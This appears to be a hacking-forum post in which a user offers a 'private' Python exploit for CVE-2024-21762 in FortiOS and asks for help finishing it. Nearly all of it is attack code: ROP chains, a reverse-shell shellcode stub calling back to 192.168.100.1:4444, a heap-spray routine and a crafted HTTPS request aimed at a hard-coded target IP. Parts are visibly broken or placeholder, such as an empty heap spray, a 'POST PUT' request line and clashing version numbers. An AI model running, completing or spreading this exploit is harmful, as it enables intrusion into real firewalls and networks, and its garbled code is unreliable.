CVE-2024-21762 - need help improving for FortiOS v2.7.4

ivan_kuzmin · 01.05.2024

Here is a private version exploit for this CVE, if anyone could help me to complete it for FortiOS version 7.2.4 please DM me .

Python:

import socket
import ssl
import struct
import logging
import time

# Global variables
s_target_ip = "185.100.232.228"
s_target_port = 8443  # Adjust the port as needed
payload_offset = 0x100
buf_offset = 0x200
write_offset = 0x300
data_addr = 0x123456789abcdef0
gadget_pivot_1 = 0xdeadbeef  # Update with your actual gadget address
pc_data_offset = 0x400
evil_method = b'PUT'
symlink_name = "payload.txt"  # Update with your symlink name

# Set up logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)


# Define shellcode for fsread payload
def craft_shellcode_fsread(data_addr, symlink_name):
    sc = b''
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x000000000042fa18)  # : pop rsi ; ret
    sc += b'///////\x00'
    sc += struct.pack('<Q', 0x000000000042f69e)  # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x0000000000bc61ae)  # : mov qword ptr [rdi], rsi ; ret
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += b'/migadmi'
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x8)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += b'n/fonts/'
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x10)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += struct.pack('8s', symlink_name.encode())
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x18)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042f69e)  # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x00000)  # : pop rsi ; ret
    sc += struct.pack('<Q', data_addr + 0x8)
    sc += struct.pack('<Q', 0x000000000051e0bb)  # : pop rax ; ret
    sc += struct.pack('<Q', 88)
    sc += struct.pack('<Q', 0x0000000000401ca8)  # : syscall
    return sc


# Define shellcode for reverse shell payload
def craft_shellcode_reverse_shell(target_ip, target_port):
    shellcode = (
        b"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2"  # Zero out registers
        b"\x52\x57\x48\x8d\x3c\x24\x48\x31\xc0\xb0\x02\x0f\x05"  # socket syscall
        b"\x48\x89\xc7\x48\x31\xc0\xb0\x02\x66\xc7\x44\x24\x02"  # Connect to target IP and port
        + struct.pack("!H", target_port) +
        socket.inet_aton(target_ip) +
        b"\x48\x89\xe6\x48\x31\xd2\xb2\x10\x48\x31\xc0\xb0\x29"  # syscall to socket
        b"\x0f\x05\x48\x89\xc2\x52\x48\x8d\x3c\x24\x48\x31\xc0"  # syscall to connect
        b"\xb0\x02\x0f\x05\x48\x31\xff\x48\xff\xc7\x48\x31\xc0"  # Write syscall
        b"\x48\x31\xf6\x48\x31\xd2\x48\x89\xe6\x48\x89\x54\x24"
        b"\x08\x48\x8b\x74\x24\x08\x48\x31\xc0\xb0\x21\x0f\x05"  # execve syscall
        b"\x48\x31\xff\x48\xff\xc7\x48\x31\xc0\xb0\x21\x0f\x05"  # execve syscall
    )
    return shellcode


# Define ROP chain for mprotect
def craft_rop_mprotect(data_addr):
    sc = b''
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x00000000004d25ec)  # : pop rcx ; ret
    sc += struct.pack('<Q', 0xfffffffffffe000) # -0x2000
    sc += struct.pack('<Q', 0x00000000011face0) # : add rdi, rcx ; xor eax, eax ; mov byte ptr [rdi], 0 ; pop rbp ; ret
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x00000000004d25ec) # : pop rcx ; ret
    sc += struct.pack('<Q', 0xfffffff0) # : -0x10 & 0xFFffFFff
    sc += struct.pack('<Q', 0x000000000042fdc5) # : pop rdx ; ret
    sc += struct.pack('<Q', 7)
    sc += struct.pack('<Q', 0x000000000042fa18) # : pop rsi ; ret
    sc += struct.pack('<Q', 0x5000)
    sc += struct.pack('<Q', 0x000000000042f69e) # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x000000000042f080) # : call rax
    return sc

def create_ssl_socket(target_ip, target_port, auto_handshake=1):
    try:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE # Disable certificate verification
        ctx.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 # Disable SSLv2 and SSLv3
        ctx.options |= ssl.OP_NO_COMPRESSION # Disable compression

        sock = socket.create_connection((target_ip, target_port))
        ssl_sock = ctx.wrap_socket(sock, server_hostname=target_ip)
        if auto_handshake:
            ssl_sock.do_handshake()
        return ssl_sock
    except ssl.SSLError as e:
        logger.error("SSL Error: %s" % str(e))
        raise
    except socket.error as e:
        logger.error("Socket Error: %s" % str(e))
        raise
    except Exception as e:
        logger.error("An error occurred: %s" % str(e))
        raise




# Perform heap spray
def do_heap_spray():
    try:
        logger.info("[*] Performing heap spray...")
        spray_sock = create_ssl_socket(s_target_ip, s_target_port, 0)
        # Perform heap spray operations here
        spray_sock.close()
        logger.info("[+] Heap spray successful!")
    except Exception as e:
        logger.error("Heap spray failed: %s" % str(e))
        raise


# Exploit function
def do_exploit():
    try:
        do_heap_spray()
        time.sleep(3)
        logger.info("[*] Preparing shellcode and reverse shell payload...")
        reverse_shell_payload = craft_shellcode_reverse_shell("192.168.100.1", 4444)
        shellcode_fsread = craft_shellcode_fsread(data_addr, symlink_name)
        rop_payload = craft_rop_mprotect(data_addr)
        logger.info("[*] Sending payload...")
        payload_data = b''
        payload_data += b'A' * payload_offset
        payload_data += reverse_shell_payload
        payload_data += b'B' * (buf_offset - payload_offset - len(reverse_shell_payload))
        payload_data += shellcode_fsread
        payload_data += b'C' * (write_offset - buf_offset - len(shellcode_fsread))
        payload_data += rop_payload
        payload_data += b'D' * (write_offset - buf_offset - len(rop_payload))
        payload_data += struct.pack('<Q', gadget_pivot_1) # ret gadget
        payload_data += struct.pack('<Q', data_addr + pc_data_offset)
        payload_header = b''
        payload_header += b'POST ' + evil_method + b' HTTP/1.1\r\n'
        payload_header += b'Host: ' + s_target_ip.encode() + b':' + str(s_target_port).encode() + b'\r\n'
        payload_header += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/95.0.4638.69 Safari/537.36\r\n'
        payload_header += b'Content-Length: ' + str(len(payload_data)).encode() + b'\r\n'
        payload_header += b'\r\n'
        payload_sock = create_ssl_socket(s_target_ip, s_target_port, 0)
        payload_sock.sendall(payload_header + payload_data)
        logger.info("[+] Vulnerability exploited successfully!")
    except Exception as e:
        logger.error("Exploit failed: %s" % str(e))
        raise


#Main function
def main():
    try:
        do_exploit()
    except Exception as e:
        logger.error("An error occurred: %s" % str(e))
        raise


if __name__ == "__main__":
    main()

CVE-2024-21762 - need help improving for FortiOS v2.7.4

ivan_kuzmin

floppy-диск